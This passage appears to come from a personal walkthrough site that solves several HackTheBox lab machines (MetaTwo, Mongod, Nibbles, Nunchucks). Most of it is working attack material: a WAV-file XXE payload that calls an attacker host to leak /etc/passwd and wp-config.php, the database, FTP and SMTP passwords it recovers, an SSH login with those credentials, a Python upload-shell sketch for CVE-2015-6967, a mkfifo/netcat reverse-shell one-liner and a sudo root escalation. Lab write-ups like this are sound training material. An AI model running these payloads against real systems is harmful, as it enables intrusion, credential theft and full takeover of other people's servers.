Now we are ready to upload payload.wav at http://metapress.htb/wp-admin/upload.php. After we do, on the command line where we were serving our xxe.dtd file, we can read:

```
10.10.11.186:39962 [404]: GET /?p=jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw== - No such file or directory
```

We will use PHP to decode this. Create a .php file with the following code; just be sure to replace 'base64here' with the base64 returned by the WordPress server:

```php
<?php echo zlib_decode(base64_decode('base64here')); ?>
```

    In my case, I will call the file code.php, and it will have the following php content:

    <?php echo zlib_decode(base64_decode('jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw=='); ?>\n

    Give executable permission to th file code.php and execute it:

    chmod +x code.php\nphp code.php\n

    Results:

    root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:103:109::/nonexistent:/usr/sbin/nologin\nsshd:x:104:65534::/run/sshd:/usr/sbin/nologin\njnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash\nsystemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin\nsystemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin\nmysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false\nproftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin\nftp:x:107:65534::/srv/ftp:/usr/sbin/nologin\n

    Users with access to the bash terminal would be: root and jnelson. Noted!

To request different content from the WordPress server, we only need to modify our xxe.dtd file and use a different path instead of "/etc/passwd". Common files to check out are:

• username/.ssh/id_rsa: the user's private key, with which we could try to log in to the SSH server.
• /etc/shadow: to extract hashes.
• On a WordPress server, wp-config.php: here you can often find credentials.
• Logs and more...

Let's start with wp-config.php. We know from previous scans that the WordPress installation is running on an nginx server. Also, we know the wp-config.php file is always located at the root of the WordPress installation. Reading the documentation, we can see that nginx has a file that lists the enabled sites and provides an absolute path to them. That file is "/etc/nginx/sites-enabled/default". So, with that in mind, we can craft our xxe-nginx.dtd file with this content:

    <!ENTITY % file SYSTEM \"php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/nginx/sites-enabled/default\">\n<!ENTITY % init \"<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>\" >\n

    And for our payload-nginx.wav, we run:

    echo -en 'RIFF\\xb8\\x00\\x00\\x00WAVEiXML\\x7b\\x00\\x00\\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '\"'\"'http://10.10.14.33:1234/xxe-nginx.dtd'\"'\"'>%remote;%init;%trick;]>\\x00' > payload.wav\n

    Now, we start our php server:

```bash
php -S 10.10.14.33:1234
```

After uploading payload-nginx.wav from http://metapress.htb/wp-admin/upload.php, our php server will display:

```
10.10.11.186:45010 [404]: GET /?p=XVHbbsMgDH1OvsKr8tBOauhjlWrah+wSUQrEXQIIkybT0n37IK2qrpaMLHN8zjGQ9Cfp4SfPsxYpSAPbze5Wv1XVR5UaeeatDcBO3LNhGFgnA3deEpVN2LN9a3XCoDnIEeazdI27Vk3o2ngL10AFy6IJwdWNTfwEF4OHoOET0iTFXswsLsNnNMiVvCA1gCLTFkW/HetsJUERe9xPhiwm8vXgntNcefzTHI3/gvvCVDMLGhE2x8kkEHnZCCmOAWhcR0Le4FjNL+Z7wyIs5bbcrJXrSrLia9a813uOgssjTYJockZPR5dS6kmjmlDYiU56dbEjR4dxfej4mITjB9TGhlrZ3hzAKnXhPud/ - or directory
```

    With this code, we craft the file code-nginx.php and give it execution permissions:

```bash
nano code-nginx.php
```

The content of the file will be:

```php
<?php echo zlib_decode(base64_decode('XVHbbsMgDH1OvsKr8tBOauhjlWrah+wSUQrEXQIIkybT0n37IK2qrpaMLHN8zjGQ9Cfp4SfPsxYpSAPbze5Wv1XVR5UaeeatDcBO3LNhGFgnA3deEpVN2LN9a3XCoDnIEeazdI27Vk3o2ngL10AFy6IJwdWNpQBPL7D4x7ZYRTfwEF4OHoOET0iTFXswsLsNnNMiVvCA1gCLTFkW/HetsJUERe9xPhiwm8vXgntNcefzTHI3/gvvCVDMLGhE2x8kkEHnZCCmOAWhcR0RpbBGRYbs2qsdJ4Le4FjNL+Z7wyIs5bbcrJXrSrLia9a813uOgssjTYJockZPR5dS6kmjmlDYiU56dbEjR4dxfej4mITjB9TGhlrZ3hzAKnXhPud/')); ?>
```

Then we run:

```bash
php code-nginx.php
```

Results:

```
server {

        listen 80;
        listen [::]:80;

        root /var/www/metapress.htb/blog;

        index index.php index.html;

        if ($http_host != "metapress.htb") {
                rewrite ^ http://metapress.htb/;
        }

        location / {
                try_files $uri $uri/ /index.php?$args;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/var/run/php/php8.0-fpm.sock;
        }

        location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$ {
                expires max;
                log_not_found off;
        }

}
```

Nice, now we know that root is set to "/var/www/metapress.htb/blog" (line 6 of the config). With this, we also know the location of the wp-config.php file (/var/www/metapress.htb/blog/wp-config.php).

    Following previous steps, now we need to craft:

    • payload-wpconfig.wav file: to upload it to http://metapress.htb/wp-admin/upload.php.
    • xxe-wpconfig.dtd file: that we will serve with a php server.

    Let's craft xxe-wpconfig.dtd:

```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>" >
```

Now, craft the payload-wpconfig.wav file:

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.33:1234/xxe-wpconfig.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload-wpconfig.wav
```

Launch the php server from the folder where we want to share the file xxe-wpconfig.dtd:

```bash
php -S 10.10.14.33:1234
```

After uploading our payload-wpconfig.wav file from http://metapress.htb/wp-admin/upload.php, we can read from the command line from where we launched the php server:

```
10.10.11.186:57388 [404]: GET /?p=jVVZU/JKEH2+VvkfhhKMoARUQBARAoRNIEDCpgUhIRMSzEYyYVP87TdBBD71LvAANdNzTs/p6dMPaUMyTk9CgQBgJAg0ToVAFwFy/gsc4njOgkDUTdDVTaFhQssCgdDpiQBFWYMXAMtn2TpRI7ErgPGKPsGAP3l68glXW9HN6gHEtqC5Rf9+vk2Trf9x3uAsa+Ek8eN8g6DpLtXKuxix2ygxyzDCzMwteoX28088SbfQr2mUKJpxIRR9zClu1PHZ/FcWOYkzLYgA0t0LAVkDYxNySNYmh0ydHwVa+A+GXIlo0eSWxEZiXOUjxxSu+gcaXVE45ECtDIiDvK5hCIwlTps4S5JsAVl0qQXd5tEvPFS1SjDbmnwR7LcLNFsjmRK1VUtEBlzu7nmIYBr7kqgQcYZbdFxC/C9xrvRuXKLep1lZzhRWVdaI1m7q88ov0V8KO7T4fyFnCXr/qEK/7NN01dkWOcURa6/hWeby9AQEAGE7z1dD8tgpjK6BtibPbAie4MoCnCYAmlOQhW8jM5asjSG4wWN42F04VpJoMyX2iew7PF8fLO159tpFKkDElhQZXV4ZC9iIyIF1Uh2948/3vYy/2WoWeq+51kq524zMXqeYugXa4+WtmsazoftvN6HJXLtFssdM2NIre/18eMBfj20jGbkb9Ts2F6qUZr5AvE3EJoMwv9DJ7n3imnxOSAOzq3RmvnIzFjPEt9SA832jqFLFIplny/XDVbDKpbrMcY3I+mGCxxpDNFrL80dB2JCk7IvEfRWtNRve1KYFWUba2bl2WerNB+/v5GXhI/c2e+qtvlHUqXqO/FMpjFZh3vR6qfBUTg4Tg8Doo1iHHqOXyc+7fERNkEIqL1zgZnD2NlxfFNL+O3VZb08S8RhqUndU9BvFViGaqDJHFC9JJjsZh65qZ34hKr6UAmgSDcsik36e49HuMjVSMnNvcF4KPHzchwfWRng4ryXxq2V4/dF6vPXk/6UWOybscdQhrJinmIhGhYqV9lKRtTrCm0lOnXaHdsV8Za+DQvmCnrYooftCn3/oqlwaTju59E2wnC7j/1iL/VWwyItID289KV+6VNaNmvE66fP6Kh6cKkN5UFts+kD4qKfOhxWrPKr5CxWmQnbKflA/q1OyUBZTv9biD6Uw3Gqf55qZckuRAJWMcpbSvyzM4s2uBOn6Uoh14Nlm4cnOrqRNJzF9ol+ZojX39SPR60K8muKrRy61bZrDKNj7FeNaHnAaWpSX+K6RvFsfZD8XQQpgC4PF/gAqOHNFgHOo6AY0rfsjYAHy9mTiuqqqC3DXq4qsvQIJIcO6D4XcUfBpILo5CVm2YegmCnGm0/UKDO3PB2UtuA8NfW/xboPNk9l28aeVAIK3dMVG7txBkmv37kQ8SlA24Rjp5urTfh0/vgAe8AksuA82SzcIpuRI53zfTk/+Ojzl3c4VYNl8ucWyAAfYzuI2X+w0RBawjSPCuTN3tu7lGJZiC1AAoryfMiac2U5CrO6a2Y7AhV0YQWdYudPJwp0x76r/Nw== - No such file or directory
```

    With this, prepare the php file code-wpconfig.php to execute and extract the content. The content of the code-wpconfig.php file would be:

    <?php echo zlib_decode(base64_decode('jVVZU/JKEH2+VvkfhhKMoARUQBARAoRNIEDCpgUhIRMSzEYyYVP87TdBBD71LvAANdNzTs/p6dMPaUMyTk9CgQBgJAg0ToVAFwFy/gsc4njOgkDUTdDVTaFhQssCgdDpiQBFWYMXAMtn2TpRI7ErgPGKPsGAP3l68glXW9HN6gHEtqC5Rf9+vk2Trf9x3uAsa+Ek8eN8g6DpLtXKuxix2ygxyzDCzMwteoX28088SbfQr2mUKJpxIRR9zClu1PHZ/FcWOYkzLYgA0t0LAVkDYxNySNYmh0ydHwVa+A+GXIlo0eSWxEZiXOUjxxSu+gcaXVE45ECtDIiDvK5hCIwlTps4S5JsAVl0qQXd5tEvPFS1SjDbmnwR7LcLNFsjmRK1VUtEBlzu7nmIYBr7kqgQcYZbdFxC/C9xrvRuXKLep1lZzhRWVdaI1m7q88ov0V8KO7T4fyFnCXr/qEK/7NN01dkWOcURa6/hWeby9AQEAGE7z1dD8tgpjK6BtibPbAie4MoCnCYAmlOQhW8jM5asjSG4wWN42F04VpJoMyX2iew7PF8fLO159tpFKkDElhQZXV4ZC9iIyIF1Uh2948/3vYy/2WoWeq+51kq524zMXqeYugXa4+WtmsazoftvN6HJXLtFssdM2NIre/18eMBfj20jGbkb9Ts2F6qUZr5AvE3EJoMwv9DJ7n3imnxOSAOzq3RmvnIzFjPEt9SA832jqFLFIplny/XDVbDKpbrMcY3I+mGCxxpDNFrL80dB2JCk7IvEfRWtNRve1KYFWUba2bl2WerNB+/v5GXhI/c2e+qtvlHUqXqO/FMpjFZh3vR6qfBUTg4Tg8Doo1iHHqOXyc+7fERNkEIqL1zgZnD2NlxfFNL+O3VZb08S8RhqUndU9BvFViGaqDJHFC9JJjsZh65qZ34hKr6UAmgSDcsik36e49HuMjVSMnNvcF4KPHzchwfWRng4ryXxq2V4/dF6vPXk/6UWOybscdQhrJinmIhGhYqV9lKRtTrCm0lOnXaHdsV8Za+DQvmCnrYooftCn3/oqlwaTju59E2wnC7j/1iL/VWwyItID289KV+6VNaNmvE66fP6Kh6cKkN5UFts+kD4qKfOhxWrPKr5CxWmQnbKflA/q1OyUBZTv9biD6Uw3Gqf55qZckuRAJWMcpbSvyzM4s2uBOn6Uoh14Nlm4cnOrqRNJzF9ol+ZojX39SPR60K8muKrRy61bZrDKNj7FeNaHnAaWpSX+K6RvFsfZD8XQQpgC4PF/gAqOHNFgHOo6AY0rfsjYAHy9mTiuqqqC3DXq4qsvQIJIcO6D4XcUfBpILo5CVm2YegmCnGm0/UKDO3PB2UtuA8NfW/xboPNk9l28aeVAIK3dMVG7txBkmv37kQ8SlA24Rjp5urTfh0/vgAe8AksuA82SzcIpuRI53zfTk/+Ojzl3c4VYNl8ucWyAAfYzuI2X+w0RBawjSPCuTN3tu7lGJZiC1AAoryfMiac2U5CrO6a2Y7AhV0YQWdYudPJwp0x76r/Nw==')); ?>\n

    Run:

    php code-wpconfig.php\n

    Results are the content of the wp-config.php file of the wordpress installation:

    <?php\n/** The name of the database for WordPress */\ndefine( 'DB_NAME', 'blog' );\n\n/** MySQL database username */\ndefine( 'DB_USER', 'blog' );\n\n/** MySQL database password */\ndefine( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );\n\n/** MySQL hostname */\ndefine( 'DB_HOST', 'localhost' );\n\n/** Database Charset to use in creating database tables. */\ndefine( 'DB_CHARSET', 'utf8mb4' );\n\n/** The Database Collate type. Don't change this if in doubt. */\ndefine( 'DB_COLLATE', '' );\n\ndefine( 'FS_METHOD', 'ftpext' );\ndefine( 'FTP_USER', 'metapress.htb' );\ndefine( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );\ndefine( 'FTP_HOST', 'ftp.metapress.htb' );\ndefine( 'FTP_BASE', 'blog/' );\ndefine( 'FTP_SSL', false );\n\n/**#@+\n * Authentication Unique Keys and Salts.\n * @since 2.6.0\n */\ndefine( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );\ndefine( 'SECURE_AUTH_KEY',  'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );\ndefine( 'LOGGED_IN_KEY',    'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );\ndefine( 'NONCE_KEY',        'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );\ndefine( 'AUTH_SALT',        '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );\ndefine( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );\ndefine( 'LOGGED_IN_SALT',   '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );\ndefine( 'NONCE_SALT',       '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );\n\n/**\n * WordPress Database Table prefix.\n */\n$table_prefix = 'wp_';\n\n/**\n * For developers: WordPress debugging mode.\n * @link https://wordpress.org/support/article/debugging-in-wordpress/\n */\ndefine( 'WP_DEBUG', false );\n\n/** Absolute path to the WordPress directory. */\nif ( ! defined( 'ABSPATH' ) ) {\n        define( 'ABSPATH', __DIR__ . '/' );\n}\n\n/** Sets up WordPress vars and included files. */\nrequire_once ABSPATH . 'wp-settings.php';\n

    Some lines are different from the regular wp-config.php file of a Wordpress installation. They also provide credentials to access an ftp server:

    define( 'FS_METHOD', 'ftpext' );\ndefine( 'FTP_USER', 'metapress.htb' );\ndefine( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );\ndefine( 'FTP_HOST', 'ftp.metapress.htb' );\ndefine( 'FTP_BASE', 'blog/' );\ndefine( 'FTP_SSL', false );\n

So... let's connect to the FTP server:

```bash
ftp 10.10.11.186

# After this we will be asked for our username and password.
# Enter username: metapress.htb
# Enter password: 9NYS_ii@FyL_p5M2NvJ
```
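If you want to script the download instead of using the interactive client, Python's ftplib can do the same thing. A minimal sketch, assuming the file sits at mailer/send_email.php as per the listing below:

```python
# Sketch: connect with the recovered FTP credentials and pull the mailer script.
from ftplib import FTP

ftp = FTP("10.10.11.186")
ftp.login(user="metapress.htb", passwd="9NYS_ii@FyL_p5M2NvJ")
print(ftp.nlst())  # should show the top-level folders (blog, mailer)

with open("send_email.php", "wb") as fh:
    ftp.retrbinary("RETR mailer/send_email.php", fh.write)
ftp.quit()
```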

We can access two folders on the FTP server: blog and mailer. After browsing and inspecting the files, there is one that catches my attention: /mailer/send_email.php. To download the file, run from the FTP prompt:

```
mget send_email.php
```

From our attacking machine we can see the content of that file:

```bash
cat send_email.php
```

    Results:

    <?php\n/*\n * This script will be used to send an email to all our users when ready for launch\n*/\n\nuse PHPMailer\\PHPMailer\\PHPMailer;\nuse PHPMailer\\PHPMailer\\SMTP;\nuse PHPMailer\\PHPMailer\\Exception;\n\nrequire 'PHPMailer/src/Exception.php';\nrequire 'PHPMailer/src/PHPMailer.php';\nrequire 'PHPMailer/src/SMTP.php';\n\n$mail = new PHPMailer(true);\n\n$mail->SMTPDebug = 3;                               \n$mail->isSMTP();            \n\n$mail->Host = \"mail.metapress.htb\";\n$mail->SMTPAuth = true;                          \n$mail->Username = \"jnelson@metapress.htb\";                 \n$mail->Password = \"Cb4_JmWM8zUZWMu@Ys\";                           \n$mail->SMTPSecure = \"tls\";                           \n$mail->Port = 587;                                   \n\n$mail->From = \"jnelson@metapress.htb\";\n$mail->FromName = \"James Nelson\";\n\n$mail->addAddress(\"info@metapress.htb\");\n\n$mail->isHTML(true);\n\n$mail->Subject = \"Startup\";\n$mail->Body = \"<i>We just started our new blog metapress.htb!</i>\";\n\ntry {\n    $mail->send();\n    echo \"Message has been sent successfully\";\n} catch (Exception $e) {\n    echo \"Mailer Error: \" . $mail->ErrorInfo;\n}\n

This script contains credentials for the user jnelson, whom we had already spotted in the /etc/passwd file; now we also have his password.

From the initial enumeration of ports and services on the MetaTwo machine, we know that the SSH service is running. We try to log in:

```bash
# Quick install of sshpass if you prefer to enter the ssh connection in one line.
sudo apt install sshpass
sshpass -p 'Cb4_JmWM8zUZWMu@Ys' ssh jnelson@10.10.11.186
```

Now you are in jnelson's terminal. To get the user's flag, run:

```bash
cat user.txt
```

## Getting the System's flag

    Coming soon.

    ","tags":["walkthrough"]},{"location":"htb-metatwo/#some-other-write-ups-and-learning-material-related","title":"Some other write-ups and learning material related","text":"
    • https://tryhackme.com/room/wordpresscve202129447
    • Wpscan: CVE-2021-29447
    • https://www.maketecheasier.com/pgp-encryption-how-it-works/
    ","tags":["walkthrough"]},{"location":"htb-mongod/","title":"Walkthrough - A HackTheBox machine - Mongod","text":"

    Enumerate open services/ports:

    nmap -sC -sV $ip -Pn -p-\n

    Ports 22 and 27017 are open.

    mongo IP:port\n# in my case: mongo 10.129.228.30:27017 \n

    Now, use mongodb cheat sheet to browse the databases:

    show databases\nuse sensitive_information\nshow collections\ndb.flag.find()\n
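The same enumeration can be scripted with pymongo, as an alternative to the mongo shell. A minimal sketch, assuming pymongo is installed (pip install pymongo):

```python
# Sketch: connect to the exposed MongoDB instance and read the flag.
from pymongo import MongoClient

client = MongoClient("mongodb://10.129.228.30:27017/")
print(client.list_database_names())

db = client["sensitive_information"]
print(db.list_collection_names())
print(db["flag"].find_one())
```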
    ","tags":["walkthrough","mongodb","port 27017"]},{"location":"htb-nibbles/","title":"Nibbles - A HackTheBox machine","text":"


```bash
nmap -sC -sV -Pn 10.129.96.84
```

    Results:

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Visiting IP:80 in the browser and reviewing the source code, there is a comment:

```html
<!-- /nibbleblog/ directory. Nothing interesting here! -->
```

    So, we have a website at http://10.129.96.84/nibbleblog/

    Dirb enumeration reveals a login panel: http://10.129.96.84/nibbleblog/admin.php

```bash
dirb http://10.129.96.84/nibbleblog/ /usr/share/wordlists/dirb/common.txt
```

Too many login attempts too quickly trigger a lockout with the message "Nibbleblog security error - Blacklist protection".

Also, dirb enumeration reveals some directories that are listable. Browsing around, we get to this file: http://10.129.96.84/nibbleblog/content/private/users.xml, where the user "admin" is exposed.

Also, the CMS version is disclosed at http://10.129.96.84/nibbleblog/README:

```
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
```

    A quick search for that version brings up this vulnerability:

    https://github.com/dix0nym/CVE-2015-6967/blob/main/README.md

    In the usage example we can read:

```bash
python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php
```

    Default credentials are:

```
admin:nibbles
```

    Also, reading the code of the exploit, we can see that the triggered endpoint for this CVE-2015-6967 is:

```python
uploadURL = f"{nibbleURL}admin.php?controller=plugins&action=config&plugin=my_image"
```
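For reference, this is a rough sketch of what the linked exploit automates: authenticate against admin.php with the default credentials and push a PHP payload through the my_image plugin endpoint. The form field names below are placeholders/assumptions; copy the exact ones from the PoC if this does not work as-is:

```python
# Sketch: log in to Nibbleblog and upload a shell via the my_image plugin.
import requests

base = "http://10.129.96.84/nibbleblog/"
s = requests.Session()

# Assumption: the login form uses fields named username/password.
s.post(base + "admin.php", data={"username": "admin", "password": "nibbles"})

# Upload through the vulnerable plugin endpoint (field name is a placeholder).
upload = base + "admin.php?controller=plugins&action=config&plugin=my_image"
with open("shell.php", "rb") as fh:
    s.post(upload, files={"plugin_image_image": ("image.php", fh, "image/png")})

# The payload should end up here as image.php:
print(base + "content/private/plugins/my_image/image.php")
```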

Knowing this, we can log in to the panel at http://10.129.96.84/nibbleblog/admin.php and go to Plugins > My Image > Configure.

In the browser, upload a file. In my case, I uploaded my pentestmonkey PHP reverse shell.

Now, we need to find where this file has been saved to. After browsing around, I ended up in http://10.129.96.84/nibbleblog/content/private/plugins/my_image/

There was a file called image.php. Before clicking on it, we open a netcat listener on our attacker machine:

```bash
nc -lnvp 1234
```

    Click on the file image.php listed in http://10.129.96.84/nibbleblog/content/private/plugins/my_image/ and you will have a reverse shell.

    Cat user.txt (under /home/nibbler).

    ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nibbles/#privilege-escalation","title":"Privilege escalation","text":"
    sudo -l\n

    Results:

```
$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```

At /home/nibbler, unzip the file personal.zip. Now you can even replace monitor.sh with a different monitor.sh. Mine contains:

```bash
/bin/bash
```

    Now run:

```bash
sudo -u root /home/nibbler/personal/stuff/monitor.sh
```

    And you are root. Remember to do a chmod if needed.

    ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nibbles/#some-input-from-htb-walkthrough","title":"Some input from HTB walkthrough","text":"

    You can run nmap script for nibbles service:

    nmap -sC -p 22,80 -oA nibbles_script_scan 10.129.42.190\n

    For privilege escalation:

```bash
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
```

    Alternative way:

    msf6 > search nibbleblog\n\nmsf6 > use exploit/multi/http/nibbleblog_file_upload\n\nmsf6 exploit(multi/http/nibbleblog_file_upload) > set rhosts 10.129.42.190\nrhosts => 10.129.42.190\nmsf6 exploit(multi/http/nibbleblog_file_upload) > set lhost 10.10.14.2 \nlhost => 10.10.14.2\n

    We need to set the admin username and password admin:nibbles and the TARGETURI to nibbleblog.

    ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nunchucks/","title":"Nunchucks - A Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#users-flag","title":"User's flag","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#enumeration","title":"Enumeration","text":"
    nmap -sC -sV 10.129.95.252 -Pn\n

    Open ports: 22, 80, and 443.

    Also http://nunchucks.htb is in results.

    Adding IP and domain nunchucks.htb to /etc/hosts.

```bash
whatweb http://nunchucks.htb
```

    And some directory enumeration:

```bash
feroxbuster -u https://nunchucks.htb -k
```

    Results:

```
200      GET      250l     1863w    19134c https://nunchucks.htb/Privacy
200      GET      245l     1737w    17753c https://nunchucks.htb/Terms
200      GET      183l      662w     9172c https://nunchucks.htb/login
200      GET      187l      683w     9488c https://nunchucks.htb/signup
```

Trying to log in to the application or sign up returns the following response messages:

```
{"response":"We're sorry but user logins are currently disabled."}

{"response":"We're sorry but registration is currently closed."}
```

Now, we will try some subdomain enumeration:

```bash
wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H "Host: FUZZ.nunchucks.htb" --hl 546
# -c: Color in output
# --hc 404: Hide 404 code responses
# -t 200: Concurrent Threads
# -u https://nunchucks.htb/: Target URL
# -w /usr/share/dirb/wordlists/common.txt: Wordlist
# -H "Host: FUZZ.nunchucks.htb": Header; "FUZZ" marks the injection point for payloads
# --hl 546: Filter out responses with a specific number of lines. In this case, 546
```

    Results: store

    We will add store.nunchucks.htb to /etc/hosts file.

    ","tags":["walkthrough"]},{"location":"htb-nunchucks/#exploitation","title":"Exploitation","text":"

    Browsing https://store.nunchucks.htb is a simple landing page to collect emails. There is a form for this purpose. After fuzzing it with Burpsuite we find this interesting output:

    Some code can get executed in that field. This vulnerability is known as Server-side Template Injection (SSTI)

    Once we have an injection endpoint, it's important to identify the application server and template engine running on it, since payloads and exploitation pretty much depends on it.

From the response headers we have: "X-Powered-By: Express".

Having a look at the template engines for Express at https://expressjs.com/en/resources/template-engines.html, there exists Nunjucks, which is close to the domain name nunchucks.

